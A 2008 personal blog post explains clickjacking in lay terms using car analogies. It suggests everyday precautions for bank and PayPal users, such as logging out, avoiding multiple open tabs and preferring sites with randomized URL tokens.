Friday, September 26, 2008

Bad security news, part 2

It looks like Clickjacking is not only a real problem, but worse than we thought.
In a nutshell, it’s when you visit a malicious website and the attacker is able to take control of the links that your browser visits. The problem affects all of the different browsers except something like lynx. The issue has nothing to do with JavaScript so turning JavaScript off in your browser will not help you. It’s a fundamental flaw with the way your browser works and cannot be fixed with a simple patch. With this exploit, once you’re on the malicious web page, the bad guy can make you click on any link, any button, or anything on the page without you even seeing it happening.
The biggest concern is when you visit sites like Paypal, your online bank, or broker. The vulnerability allows the attacker to modify parts of the web page you view, filling out forms without your knowlege. This includes overwriting buttons (like "Submit") to do something different. Slashdot has a good discussion with the following comment that does a good job of summing up the situation:
Imagine you're in a car showroom looking at a super-expensive car. It looks great and price is pretty good. So you tell the dealer you'll take the car. Except when you get in the car, you realize that someone had put a cardboard cutout in front of the car. The car you got in was actually an economy vehicle. Except now it's too late to undo your purchase!

Here's another one: Let's say you've got a bunch of buttons on your dash. Most of them control the radio, but one controls the ejection seat. While you're away, some neighbor kids from MIT think it's funny to come over and rewire the buttons on your radio. Now when you press the button to turn on your radio, you actually get ejected from the car.
Yuck. So, what do you do?

First, while the 2 Simple Rules of Browser Security are still a good idea for general security problems, it doesn't help here.

Second, it appears that this exploit would likely be tied to a Cross Site Request Forgery (CSRF) attack. This gives you some things you can do that should noticeably improve your chances:
  • When you're done at your bank or broker, always click their logout button. This will kill your session, which will keep a CSRF attack from another site being able to try to hijack the session. No session, no hijack.
  • Don't have multiple tabs open in a browser when you're going to one of these financial sites. It's possible that a CSRF attack from a different tab might be able to start a clickjack attempt in the banking tab.
  • Sites that randomize the URL string (for example, contain something like "random=FUOUOY3273" in the URL) are resistent to CSRF. Resistent, not necessarilly immune, but this is still a win. However, the random part of the URL needs to be different each time you visit (or it isn't random, right?).
Oh, and Paypal has a reputation for being vulnerable to CSRF attacks. This is a bit of a problem, if you use it (I won't). If you do, monitor your account regularly.

UPDATE 30 SEPTEMBER 2008 20:03: Related article and discussion at Slashdot.

No comments: